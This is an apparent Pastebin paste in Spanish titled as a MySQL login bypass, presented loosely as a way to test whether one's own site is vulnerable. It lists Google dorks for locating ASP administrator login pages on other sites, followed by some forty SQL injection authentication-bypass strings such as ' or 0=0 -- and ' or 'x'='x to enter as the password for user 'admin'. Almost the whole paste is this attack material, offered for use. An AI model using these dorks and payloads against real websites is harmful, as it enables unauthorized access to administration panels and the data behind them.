Advertisement
jjissuss

Bypass,MySQL vulnerabilidad

Feb 3rd, 2014
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.18 KB | None | 0 0
  1. Esta vulnerabilidad se debe a una mala filtración de lo que conocemos como variables en la programación.
  2.  
  3. A continuación mostraremos unos claros ejemplos y métodos de como probar si nuestra web es vulnerable al mal filtrado.
  4. Mediante los siguientes Dorks, se pueden encontrar los páneles de administración para sites con MySql
  5.  
  6. inurl:admin.asp
  7. inurl:admin/login.asp
  8. inurl:login/admin.asp
  9. inurl:adminlogin.asp
  10. inurl:adminhome.asp
  11. inurl:admin_login.asp
  12. inurl:administratorlogin.asp
  13. inurl:login/administrator.asp
  14. inurl:administrator_login.asp
  15.  
  16. Y mediante las siguientes sintaxis se puede hacer lo que se conoce como bypass, por supuesto en web vulnerables.
  17. User: admin y con los siguientes password:
  18.  
  19. ‘ or 0=0 –
  20. ” or 0=0 –
  21. or 0=0 –
  22. ‘ or 0=0 #
  23. ” or 0=0 #
  24. or 0=0 #
  25. ‘ or ‘x’=’x
  26. ” or “x”=”x
  27. ‘) or (‘x’=’x
  28. ‘ or 1=1–
  29. ” or 1=1–
  30. or 1=1–
  31. ‘ or a=a–
  32. ” or “a”=”a
  33. ‘) or (‘a’=’a
  34. “) or (“a”=”a
  35. hi” or “a”=”a
  36. hi” or 1=1 –
  37. hi’ or 1=1 –
  38. hi’ or ‘a’=’a
  39. hi’) or (‘a’=’a
  40. hi”) or (“a”=”a
  41.  
  42. ‘or’1′=’1
  43. ‘or’1′=’1
  44. ‘ or ’1′=’1
  45. ‘ or ‘x’=’x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement